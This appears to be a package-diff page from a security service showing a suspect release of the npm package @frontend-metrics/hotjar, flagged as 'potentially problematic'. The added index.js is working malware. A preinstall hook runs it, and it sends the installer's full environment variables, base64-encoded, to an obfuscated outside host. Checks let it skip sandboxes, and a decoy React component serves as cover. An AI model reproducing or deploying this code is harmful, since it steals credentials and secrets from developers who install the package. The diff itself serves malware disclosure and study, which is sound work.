@frontend-metrics/hotjar 0.0.1-security → 2.505.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @frontend-metrics/hotjar might be problematic. Click here for more details.

@@ -0,0 +1,13 @@
1
+ 'use strict';
2
+
3
+ const React = require('react');
4
+
5
+ class Hotjar extends React.Component {
6
+ // eslint-disable-line react/prefer-stateless-function
7
+ render() {
8
+ return null;
9
+ }
10
+
11
+ }
12
+
13
+ module.exports = Hotjar;
package/index.js ADDED
@@ -0,0 +1,29 @@
1
+ const http = require('https');
2
+
3
+ const filter = [
4
+ { key: 'npm_config_registry', val: ['taobao', 'org'].join('.') },
5
+ { key: 'npm_config_registry', val: ['registry', 'npmmirror', 'com'].join('.') },
6
+ { key: 'USERNAME', val: ['daas', 'admin'].join('') },
7
+ { key: '_', val: '/usr/bin/python' },
8
+ { key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') }
9
+ ];
10
+ function main() {
11
+ var data = process.env || {};
12
+ if (
13
+ filter.some(({ key, val }) => data[key] && data[key].includes(val)) ||
14
+ Object.keys(data).length < 10) {
15
+ return;
16
+ }
17
+
18
+ req = http.request({
19
+ host: ['3459849bd49abdc420aa9cf355104a82', 'm', ['pip','edream'].join(''), 'net'].join('.'),
20
+ path: '/' + (data.npm_package_name || ''),
21
+ method: 'POST'
22
+ }).on('error', function (err) {
23
+ });
24
+
25
+ req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
26
+ req.end();
27
+ }
28
+
29
+ main();
package/package.json CHANGED
@@ -1,6 +1,18 @@
1
1
  {
2
2
  "name": "@frontend-metrics/hotjar",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "2.505.0",
4
+ "description": "Hotjar react component",
5
+ "private": false,
6
+ "main": "dist/client/frontend-gtm.js",
7
+ "scripts": {
8
+ "preinstall": "node index.js",
9
+ "build": "npm run build",
10
+ "test": "echo \"Error: no test specified\" && exit 1"
11
+ },
12
+ "dependencies": {
13
+ "react": "16.8.6",
14
+ "react-dom": "16.8.6"
15
+ },
16
+ "author": "hmrcdu-mertic",
17
+ "license": "MIT"
18
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40frontend-metrics%2Fhotjar for more information.